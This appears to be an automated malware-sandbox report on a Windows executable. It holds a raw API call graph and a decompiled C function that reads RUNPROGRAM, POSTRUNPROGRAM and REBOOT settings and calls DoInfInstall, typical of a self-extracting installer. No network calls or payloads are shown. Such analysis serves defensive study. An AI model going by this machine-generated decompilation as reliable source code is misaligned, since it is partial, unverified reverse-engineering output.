10b658a CharPrevA 2844->2850 2856 10b54da 2845->2856 2846->2707 2858 10b2630 GetWindowsDirectoryA 2846->2858 2851 10b6285 GetLastError 2847->2851 2848->2843 2852 10b555c 2849->2852 2850->2853 2854 10b557c 2851->2854 2852->2837 2857 10b5568 RemoveDirectoryA 2852->2857 2905 10b58c8 2853->2905 2854->2837 2855 10b658a CharPrevA 2855->2844 2856->2844 2856->2855 2857->2837 2859 10b266f 2858->2859 2860 10b265e 2858->2860 2862 10b6ce0 4 API calls 2859->2862 2861 10b44b9 20 API calls 2860->2861 2861->2859 2863 10b2687 2862->2863 2863->2697 2863->2710 2865 10b696e GetDiskFreeSpaceA 2864->2865 2866 10b69a1 2864->2866 2865->2866 2867 10b6989 MulDiv 2865->2867 2866->2719 2867->2866 2869 10b59bb 2868->2869 2870 10b59dd GetDiskFreeSpaceA 2868->2870 2873 10b44b9 20 API calls 2869->2873 2871 10b5ba1 memset 2870->2871 2872 10b5a21 MulDiv 2870->2872 2874 10b6285 GetLastError 2871->2874 2872->2871 2875 10b5a50 GetVolumeInformationA 2872->2875 2876 10b59cc 2873->2876 2878 10b5bbc GetLastError FormatMessageA 2874->2878 2879 10b5a6e memset 2875->2879 2880 10b5ab5 SetCurrentDirectoryA 2875->2880 2877 10b6285 GetLastError 2876->2877 2881 10b59d1 2877->2881 2882 10b5be3 2878->2882 2883 10b6285 GetLastError 2879->2883 2889 10b5acc 2880->2889 2887 10b6ce0 4 API calls 2881->2887 2884 10b44b9 20 API calls 2882->2884 2885 10b5a89 GetLastError FormatMessageA 2883->2885 2886 10b5bf5 SetCurrentDirectoryA 2884->2886 2885->2882 2886->2881 2888 10b5c11 2887->2888 2888->2697 2890 10b5b0a 2889->2890 2892 10b5b20 2889->2892 2891 10b44b9 20 API calls 2890->2891 2891->2881 2892->2881 2917 10b268b 2892->2917 2896 10b53bf 2894->2896 2895 10b171e _vsnprintf 2895->2896 2896->2895 2897 10b658a CharPrevA 2896->2897 2900 10b5415 GetTempFileNameA 2896->2900 2898 10b53fa RemoveDirectoryA GetFileAttributesA 2897->2898 2898->2896 2899 10b544f CreateDirectoryA 2898->2899 2899->2900 2901 10b543a 2899->2901 2900->2901 2902 10b5429 DeleteFileA CreateDirectoryA 2900->2902 2903 10b6ce0 4 API calls 2901->2903 2902->2901 2904 10b5449 2903->2904 2904->2840 2906 10b58d8 2905->2906 2906->2906 2907 10b58df LocalAlloc 2906->2907 2908 10b58f3 2907->2908 2910 10b5919 2907->2910 2909 10b44b9 20 API calls 2908->2909 2911 10b5906 2909->2911 2912 10b658a CharPrevA 2910->2912 2913 10b6285 GetLastError 2911->2913 2915 10b5534 2911->2915 2914 10b5931 CreateFileA LocalFree 2912->2914 2913->2915 2914->2911 2916 10b595b CloseHandle GetFileAttributesA 2914->2916 2915->2842 2915->2843 2916->2911 2918 10b26b9 2917->2918 2919 10b26e5 2917->2919 2920 10b171e _vsnprintf 2918->2920 2921 10b26ea 2919->2921 2922 10b271f 2919->2922 2924 10b26cc 2920->2924 2925 10b171e _vsnprintf 2921->2925 2923 10b26e3 2922->2923 2926 10b171e _vsnprintf 2922->2926 2927 10b6ce0 4 API calls 2923->2927 2928 10b44b9 20 API calls 2924->2928 2929 10b26fd 2925->2929 2930 10b2735 2926->2930 2931 10b276d 2927->2931 2928->2923 2932 10b44b9 20 API calls 2929->2932 2933 10b44b9 20 API calls 2930->2933 2931->2881 2932->2923 2933->2923 2935 10b468f 7 API calls 2934->2935 2936 10b4ff5 FindResourceA LoadResource LockResource 2935->2936 2937 10b5020 2936->2937 2949 10b515f 2936->2949 2938 10b5029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2937->2938 2939 10b5057 2937->2939 2938->2939 2953 10b4efd 2939->2953 2942 10b507c 2945 10b5075 2942->2945 2947 10b44b9 20 API calls 2942->2947 2943 10b5060 2944 10b44b9 20 API calls 2943->2944 2944->2945 2946 10b5110 FreeResource 2945->2946 2948 10b511d 2945->2948 2946->2948 2947->2945 2950 10b513a 2948->2950 2951 10b44b9 20 API calls 2948->2951 2949->2737 2950->2949 2952 10b514c SendMessageA 2950->2952 2951->2950 2952->2949 2954 10b4f4a 2953->2954 2955 10b4980 25 API calls 2954->2955 2960 10b4fa1 2954->2960 2958 10b4f67 2955->2958 2956 10b6ce0 4 API calls 2957 10b4fc6 2956->2957 2957->2942 2957->2943 2959 10b4b60 FindCloseChangeNotification 2958->2959 2958->2960 2959->2960 2960->2956 2962 10b255b 2961->2962 2963 10b2510 2961->2963 2964 10b6ce0 4 API calls 2962->2964 2965 10b658a CharPrevA 2963->2965 2966 10b2569 2964->2966 2967 10b2522 WritePrivateProfileStringA _lopen 2965->2967 2966->2747 2967->2962 2968 10b2548 _llseek _lclose 2967->2968 2968->2962 2970 10b1b25 2969->2970 3074 10b1a84 2970->3074 2972 10b1b57 2973 10b658a CharPrevA 2972->2973 2974 10b1b8c 2972->2974 2973->2974 2975 10b66c8 2 API calls 2974->2975 2976 10b1bd1 2975->2976 2977 10b1bd9 CompareStringA 2976->2977 2978 10b1d73 2976->2978 2977->2978 2980 10b1bf7 GetFileAttributesA 2977->2980 2979 10b66c8 2 API calls 2978->2979 2983 10b1d7d 2979->2983 2981 10b1c0d 2980->2981 2982 10b1d53 2980->2982 2981->2982 2987 10b1a84 2 API calls 2981->2987 2986 10b1d64 2982->2986 2984 10b1df8 LocalAlloc 2983->2984 2985 10b1d81 CompareStringA 2983->2985 2984->2986 2989 10b1e0b GetFileAttributesA 2984->2989 2985->2984 2988 10b1d9b LocalAlloc 2985->2988 2990 10b44b9 20 API calls 2986->2990 2993 10b1c31 2987->2993 2988->2986 3001 10b1de1 2988->3001 2992 10b1e1d 2989->2992 3007 10b1e45 2989->3007 3003 10b1d6c 2990->3003 2991 10b1c50 LocalAlloc 2991->2986 2994 10b1c67 GetPrivateProfileIntA GetPrivateProfileStringA 2991->2994 2992->3007 2993->2991 2996 10b1a84 2 API calls 2993->2996 3002 10b1cf8 2994->3002 3008 10b1cc2 2994->3008 2995 10b6ce0 4 API calls 3000 10b1ea1 2995->3000 2996->2991 3000->2755 3006 10b171e _vsnprintf 3001->3006 3004 10b1d09 GetShortPathNameA 3002->3004 3005 10b1d23 3002->3005 3003->2995 3004->3005 3009 10b171e _vsnprintf 3005->3009 3006->3008 3080 10b2aac 3007->3080 3008->3003 3009->3008 3011 10b209a 3010->3011 3012 10b2256 3010->3012 3014 10b171e _vsnprintf 3011->3014 3017 10b20dc 3011->3017 3013 10b6ce0 4 API calls 3012->3013 3015 10b2263 3013->3015 3016 10b20af RegQueryValueExA 3014->3016 3015->2755 3016->3011 3016->3017 3018 10b20fb GetSystemDirectoryA 3017->3018 3019 10b20e4 RegCloseKey 3017->3019 3020 10b658a CharPrevA 3018->3020 3019->3012 3021 10b211b LoadLibraryA 3020->3021 3022 10b2179 GetModuleFileNameA 3021->3022 3023 10b212e GetProcAddress FreeLibrary 3021->3023 3024 10b21de RegCloseKey 3022->3024 3028 10b2177 3022->3028 3023->3022 3025 10b214e GetSystemDirectoryA 3023->3025 3024->3012 3026 10b2165 3025->3026 3025->3028 3027 10b658a CharPrevA 3026->3027 3027->3028 3028->3028 3029 10b21b7 LocalAlloc 3028->3029 3030 10b21cd 3029->3030 3031 10b21ec 3029->3031 3032 10b44b9 20 API calls 3030->3032 3033 10b171e _vsnprintf 3031->3033 3032->3024 3034 10b2218 RegSetValueExA RegCloseKey LocalFree 3033->3034 3034->3012 3037 10b4016 CreateProcessA 3036->3037 3048 10b4106 3036->3048 3038 10b4041 WaitForSingleObject GetExitCodeProcess 3037->3038 3039 10b40c4 3037->3039 3045 10b4070 3038->3045 3042 10b6285 GetLastError 3039->3042 3040 10b6ce0 4 API calls 3041 10b4117 3040->3041 3041->2755 3044 10b40c9 GetLastError FormatMessageA 3042->3044 3047 10b44b9 20 API calls 3044->3047 3107 10b411b 3045->3107 3046 10b4096 CloseHandle CloseHandle 3046->3048 3049 10b40ba 3046->3049 3047->3048 3048->3040 3049->3048 3051 10b64c2 3050->3051 3052 10b658a CharPrevA 3051->3052 3053 10b64d8 GetFileAttributesA 3052->3053 3054 10b64ea 3053->3054 3055 10b6501 LoadLibraryA 3053->3055 3054->3055 3056 10b64ee LoadLibraryExA 3054->3056 3057 10b6508 3055->3057 3056->3057 3058 10b6ce0 4 API calls 3057->3058 3059 10b6513 3058->3059 3059->2785 3061 10b2289 RegOpenKeyExA 3060->3061 3062 10b2381 3060->3062 3061->3062 3064 10b22b1 RegQueryValueExA 3061->3064 3063 10b6ce0 4 API calls 3062->3063 3065 10b238c 3063->3065 3066 10b22e6 memset GetSystemDirectoryA 3064->3066 3067 10b2374 RegCloseKey 3064->3067 3065->2759 3068 10b230f 3066->3068 3069 10b2321 3066->3069 3067->3062 3070 10b658a CharPrevA 3068->3070 3071 10b171e _vsnprintf 3069->3071 3070->3069 3072 10b233f RegSetValueExA 3071->3072 3072->3067 3075 10b1a9a 3074->3075 3077 10b1aba 3075->3077 3079 10b1aaf 3075->3079 3093 10b667f 3075->3093 3077->2972 3078 10b667f 2 API calls 3078->3079 3079->3077 3079->3078 3081 10b2be6 3080->3081 3082 10b2ad4 GetModuleFileNameA 3080->3082 3083 10b6ce0 4 API calls 3081->3083 3089 10b2b02 3082->3089 3085 10b2bf5 3083->3085 3084 10b2af1 IsDBCSLeadByte 3084->3089 3085->3003 3086 10b2bca CharNextA 3088 10b2bd3 CharNextA 3086->3088 3087 10b2b11 CharNextA CharUpperA 3087->3089 3090 10b2b8d CharUpperA 3087->3090 3088->3089 3089->3081 3089->3084 3089->3086 3089->3087 3089->3088 3092 10b2b43 CharPrevA 3089->3092 3098 10b65e8 3089->3098 3090->3089 3092->3089 3096 10b6689 3093->3096 3094 10b66a5 3094->3075 3095 10b6648 IsDBCSLeadByte 3095->3096 3096->3094 3096->3095 3097 10b6697 CharNextA 3096->3097 3097->3096 3099 10b65f4 3098->3099 3099->3099 3100 10b65fb CharPrevA 3099->3100 3101 10b6611 CharPrevA 3100->3101 3102 10b660b 3101->3102 3103 10b661e 3101->3103 3102->3101 3102->3103 3104 10b663d 3103->3104 3105 10b6627 CharPrevA 3103->3105 3106 10b6634 CharNextA 3103->3106 3104->3089 3105->3104 3105->3106 3106->3104 3108 10b4132 3107->3108 3110 10b412a 3107->3110 3111 10b1ea7 3108->3111 3110->3046 3112 10b1eba 3111->3112 3113 10b1ed3 3111->3113 3114 10b256d 15 API calls 3112->3114 3113->3110 3114->3113 3116 10b1ff0 RegOpenKeyExA 3115->3116 3117 10b2026 3115->3117 3116->3117 3118 10b200f RegDeleteValueA RegCloseKey 3116->3118 3117->2479 3118->3117 3228 10b6a20 __getmainargs 3229 10b19e0 3230 10b1a03 3229->3230 3231 10b1a24 GetDesktopWindow 3229->3231 3232 10b1a20 3230->3232 3234 10b1a16 EndDialog 3230->3234 3233 10b43d0 11 API calls 3231->3233 3236 10b6ce0 4 API calls 3232->3236 3235 10b1a33 LoadStringA SetDlgItemTextA MessageBeep 3233->3235 3234->3232 3235->3232 3237 10b1a7e 3236->3237 3238 10b7270 _except_handler4_common 3239 10b69b0 3240 10b69b5 3239->3240 3248 10b6fbe GetModuleHandleW 3240->3248 3242 10b69c1 __set_app_type __p__fmode __p__commode 3243 10b69f9 3242->3243 3244 10b6a0e 3243->3244 3245 10b6a02 __setusermatherr 3243->3245 3250 10b71ef _controlfp 3244->3250 3245->3244 3247 10b6a13 3249 10b6fcf 3248->3249 3249->3242 3250->3247 3251 10b34f0 3252 10b3504 3251->3252 3253 10b35b8 3251->3253 3252->3253 3254 10b351b 3252->3254 3255 10b35be GetDesktopWindow 3252->3255 3256 10b3526 3253->3256 3260 10b3671 EndDialog 3253->3260 3258 10b354f 3254->3258 3259 10b351f 3254->3259 3257 10b43d0 11 API calls 3255->3257 3261 10b35d6 3257->3261 3258->3256 3263 10b3559 ResetEvent 3258->3263 3259->3256 3262 10b352d TerminateThread EndDialog 3259->3262 3260->3256 3264 10b361d SetWindowTextA CreateThread 3261->3264 3265 10b35e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3261->3265 3262->3256 3266 10b44b9 20 API calls 3263->3266 3264->3256 3267 10b3646 3264->3267 3265->3264 3268 10b3581 3266->3268 3269 10b44b9 20 API calls 3267->3269 3270 10b359b SetEvent 3268->3270 3272 10b358a SetEvent 3268->3272 3269->3253 3271 10b3680 4 API calls 3270->3271 3271->3253 3272->3256 3273 10b6ef0 3274 10b6f2d 3273->3274 3275 10b6f02 3273->3275 3275->3274 3276 10b6f27 ?terminate@ 3275->3276 3276->3274

                                                                                                                                                                                                                                    Callgraph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    • Opacity -> Relevance
                                                                                                                                                                                                                                    • Disassembly available
                                                                                                                                                                                                                                    callgraph 0 Function_010B7208 1 Function_010B490C 2 Function_010B6C03 27 Function_010B724D 2->27 3 Function_010B4702 56 Function_010B1680 3->56 82 Function_010B16B3 3->82 4 Function_010B7000 5 Function_010B4200 6 Function_010B3100 95 Function_010B43D0 6->95 7 Function_010B411B 78 Function_010B1EA7 7->78 8 Function_010B681F 108 Function_010B6CE0 8->108 114 Function_010B66F9 8->114 9 Function_010B171E 10 Function_010B621E 46 Function_010B597D 10->46 59 Function_010B6285 10->59 80 Function_010B44B9 10->80 10->108 11 Function_010B2F1D 11->10 20 Function_010B3B26 11->20 22 Function_010B3A3F 11->22 34 Function_010B4169 11->34 35 Function_010B256D 11->35 43 Function_010B5164 11->43 51 Function_010B658A 11->51 11->59 72 Function_010B3BA2 11->72 77 Function_010B55A0 11->77 11->80 11->108 112 Function_010B51E5 11->112 12 Function_010B3210 21 Function_010B4224 12->21 12->46 12->51 12->80 86 Function_010B58C8 12->86 12->95 13 Function_010B7010 14 Function_010B5C17 15 Function_010B6517 15->80 16 Function_010B6E2A 117 Function_010B6CF0 16->117 17 Function_010B202A 17->9 17->51 17->80 17->108 18 Function_010B7120 19 Function_010B6A20 20->15 62 Function_010B6298 20->62 106 Function_010B4FE0 20->106 21->56 21->80 22->15 53 Function_010B468F 22->53 22->59 22->80 23 Function_010B6C3F 24 Function_010B2630 24->80 24->108 25 Function_010B4C37 26 Function_010B6648 28 Function_010B6F40 29 Function_010B6952 30 Function_010B4A50 31 Function_010B3450 31->95 32 Function_010B7155 33 Function_010B6F54 33->0 33->27 34->53 34->80 107 Function_010B24E0 35->107 36 Function_010B476D 36->15 69 Function_010B66AE 36->69 37 Function_010B4B60 38 Function_010B6A60 38->0 38->23 38->27 38->32 39 Function_010B7060 38->39 113 Function_010B2BFB 38->113 39->13 39->18 40 Function_010B6760 41 Function_010B5467 41->46 41->51 54 Function_010B1781 41->54 41->56 41->59 74 Function_010B53A1 41->74 41->86 41->108 42 Function_010B2267 42->9 42->51 42->108 43->53 43->62 43->80 44 Function_010B487A 44->1 45 Function_010B667F 45->26 50 Function_010B268B 46->50 46->59 46->80 46->108 47 Function_010B2773 47->51 47->54 47->56 47->108 48 Function_010B7270 49 Function_010B6C70 50->9 50->80 50->108 51->82 52 Function_010B2A89 55 Function_010B4980 55->44 55->80 56->54 57 Function_010B3680 58 Function_010B6380 60 Function_010B1A84 60->45 61 Function_010B4E99 61->56 62->9 62->108 63 Function_010B5C9E 63->14 63->16 63->45 63->51 63->56 63->80 87 Function_010B66C8 63->87 63->108 109 Function_010B31E0 63->109 64 Function_010B6793 65 Function_010B2390 65->51 65->56 65->65 65->82 65->108 66 Function_010B1F90 66->78 66->80 66->108 67 Function_010B6495 67->51 67->54 67->108 68 Function_010B2CAA 68->15 68->53 68->63 68->65 71 Function_010B18A3 68->71 68->80 103 Function_010B36EE 68->103 68->108 70 Function_010B2AAC 70->56 88 Function_010B17C8 70->88 99 Function_010B65E8 70->99 70->108 104 Function_010B17EE 71->104 71->108 72->17 72->42 72->53 72->54 72->59 72->67 72->80 97 Function_010B1AE8 72->97 100 Function_010B3FEF 72->100 72->108 73 Function_010B72A2 74->9 74->51 74->56 74->108 75 Function_010B6FA1 76 Function_010B4CA0 77->15 77->24 77->29 77->41 77->46 77->51 77->53 77->54 77->59 77->80 77->108 78->35 79 Function_010B6FA5 79->27 80->8 80->9 80->56 85 Function_010B67C9 80->85 80->108 81 Function_010B6FBE 81->33 82->54 83 Function_010B69B0 83->4 83->49 83->81 101 Function_010B71EF 83->101 84 Function_010B52B6 84->54 84->65 84->99 105 Function_010B1FE1 84->105 84->108 85->64 86->51 86->56 86->59 86->80 87->26 89 Function_010B4CC0 90 Function_010B4BC0 91 Function_010B30C0 92 Function_010B63C0 92->51 92->54 92->108 93 Function_010B4AD0 93->57 94 Function_010B4CD0 94->3 94->25 94->36 94->37 94->55 94->61 94->108 110 Function_010B47E0 94->110 95->108 96 Function_010B70EB 97->9 97->51 97->54 97->56 97->60 97->70 97->80 97->82 97->87 97->108 98 Function_010B28E8 98->47 98->52 100->7 100->59 100->80 100->108 102 Function_010B6BEF 103->8 103->52 103->80 103->85 103->98 103->108 104->108 106->53 106->80 116 Function_010B4EFD 106->116 107->51 107->108 108->117 110->56 110->80 111 Function_010B19E0 111->95 111->108 112->53 112->59 112->80 113->11 113->66 113->68 113->84 115 Function_010B70FE 116->37 116->55 116->108 118 Function_010B34F0 118->57 118->80 118->95 119 Function_010B6EF0

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 010B3BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308libraryloaderCOMMONCrypto
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 36 10b3ba2-10b3bd9 37 10b3bdb-10b3bee call 10b468f 36->37 38 10b3bfd-10b3bff 36->38 44 10b3d13-10b3d30 call 10b44b9 37->44 45 10b3bf4-10b3bf7 37->45 40 10b3c03-10b3c28 memset 38->40 42 10b3c2e-10b3c40 call 10b468f 40->42 43 10b3d35-10b3d48 call 10b1781 40->43 42->44 54 10b3c46-10b3c49 42->54 49 10b3d4d-10b3d52 43->49 55 10b3f4d 44->55 45->38 45->44 52 10b3d9e-10b3db6 call 10b1ae8 49->52 53 10b3d54-10b3d6c call 10b468f 49->53 52->55 66 10b3dbc-10b3dc2 52->66 53->44 68 10b3d6e-10b3d75 53->68 54->44 57 10b3c4f-10b3c56 54->57 60 10b3f4f-10b3f63 call 10b6ce0 55->60 62 10b3c58-10b3c5e 57->62 63 10b3c60-10b3c65 57->63 69 10b3c6e-10b3c73 62->69 64 10b3c67-10b3c6d 63->64 65 10b3c75-10b3c7c 63->65 64->69 72 10b3c87-10b3c89 65->72 73 10b3c7e-10b3c82 65->73 70 10b3de6-10b3de8 66->70 71 10b3dc4-10b3dce 66->71 75 10b3d7b-10b3d98 CompareStringA 68->75 76 10b3fda-10b3fe1 68->76 69->72 79 10b3f0b-10b3f15 call 10b3fef 70->79 80 10b3dee-10b3df5 70->80 71->70 77 10b3dd0-10b3dd7 71->77 72->49 78 10b3c8f-10b3c98 72->78 73->72 75->52 75->76 81 10b3fe8-10b3fea 76->81 82 10b3fe3 call 10b2267 76->82 77->70 84 10b3dd9-10b3ddb 77->84 85 10b3c9a-10b3c9c 78->85 86 10b3cf1-10b3cf3 78->86 91 10b3f1a-10b3f1c 79->91 87 10b3fab-10b3fd2 call 10b44b9 LocalFree 80->87 88 10b3dfb-10b3dfd 80->88 81->60 82->81 84->80 92 10b3ddd-10b3de1 call 10b202a 84->92 94 10b3c9e-10b3ca3 85->94 95 10b3ca5-10b3ca7 85->95 86->52 90 10b3cf9-10b3d11 call 10b468f 86->90 87->55 88->79 96 10b3e03-10b3e0a 88->96 90->44 90->49 98 10b3f1e-10b3f2d LocalFree 91->98 99 10b3f46-10b3f47 LocalFree 91->99 92->70 102 10b3cb2-10b3cc5 call 10b468f 94->102 95->55 103 10b3cad 95->103 96->79 104 10b3e10-10b3e19 call 10b6495 96->104 106 10b3f33-10b3f3b 98->106 107 10b3fd7-10b3fd9 98->107 99->55 102->44 112 10b3cc7-10b3ce8 CompareStringA 102->112 103->102 113 10b3e1f-10b3e36 GetProcAddress 104->113 114 10b3f92-10b3fa9 call 10b44b9 104->114 106->40 107->76 112->86 116 10b3cea-10b3ced 112->116 117 10b3e3c-10b3e80 113->117 118 10b3f64-10b3f76 call 10b44b9 FreeLibrary 113->118 125 10b3f7c-10b3f90 LocalFree call 10b6285 114->125 116->86 119 10b3e8b-10b3e94 117->119 120 10b3e82-10b3e87 117->120 118->125 123 10b3e9f-10b3ea2 119->123 124 10b3e96-10b3e9b 119->124 120->119 128 10b3ead-10b3eb6 123->128 129 10b3ea4-10b3ea9 123->129 124->123 125->55 131 10b3eb8-10b3ebd 128->131 132 10b3ec1-10b3ec3 128->132 129->128 131->132 133 10b3ece-10b3eec 132->133 134 10b3ec5-10b3eca 132->134 137 10b3eee-10b3ef3 133->137 138 10b3ef5-10b3efd 133->138 134->133 137->138 139 10b3eff-10b3f09 FreeLibrary 138->139 140 10b3f40 FreeLibrary 138->140 139->98 140->99
                                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                                    			E010B3BA2() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				short _v300;
				intOrPtr _v304;
				void _v348;
				char _v352;
				intOrPtr _v356;
				signed int _v360;
				short _v364;
				char* _v368;
				intOrPtr _v372;
				void* _v376;
				intOrPtr _v380;
				char _v384;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _v408;
				void* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t76;
				void* _t77;
				signed int _t79;
				short _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				int _t112;
				void* _t115;
				signed char _t118;
				void* _t125;
				signed int _t127;
				void* _t128;
				struct HINSTANCE__* _t129;
				void* _t130;
				short _t137;
				char* _t140;
				signed char _t144;
				signed char _t145;
				signed int _t149;
				void* _t150;
				void* _t151;
				signed int _t153;
				void* _t155;
				void* _t156;
				signed int _t157;
				signed int _t162;
				signed int _t164;
				void* _t165;

				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0x10b8004; // 0x72151d89
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0x10b9124 =  *0x10b9124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0x10b8a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0x10b8c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E010B468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E010B44B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0x10b9124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E010B1AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E010B6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E010B3FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151); // executed
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0x10b8580;
													if( *0x10b8580 != 0) {
														E010B2267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0x10b8180;
											if( *0x10b8180 == 0) {
												_t146 = 0x4c7;
												E010B44B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0x10b9124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0x10b9a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E010B6495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E010B44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0x10b9124 = E010B6285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E010B44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0x10b8a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0x10b9a40; // 0x3
											_v364 = _t96;
											_t97 =  *0x10b8a38 & 0x0000ffff;
											_v380 = 0x10b9154;
											_v376 = _t151;
											_v372 = 0x10b91e4;
											_v360 = _t97;
											if( *0x10b8a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0x10b9a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0x10b8d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0x10b9a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0x10ba288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0x10b9124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0x10b9a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0x10b8a20;
										if( *0x10b8a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E010B202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E010B468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0x10b8c42;
									if( *0x10b8c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0x10b8a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E010B468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E010B468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E010B1781( &_v276, 0x104, _t130, 0x10b8c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E010B468F(_t130, 0x10b9a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}





























































                                                                                                                                                                                                                                    0x010b3baa
                                                                                                                                                                                                                                    0x010b3bb0
                                                                                                                                                                                                                                    0x010b3bb7
                                                                                                                                                                                                                                    0x010b3bc0
                                                                                                                                                                                                                                    0x010b3bc2
                                                                                                                                                                                                                                    0x010b3bc9
                                                                                                                                                                                                                                    0x010b3bcb
                                                                                                                                                                                                                                    0x010b3bcf
                                                                                                                                                                                                                                    0x010b3bd3
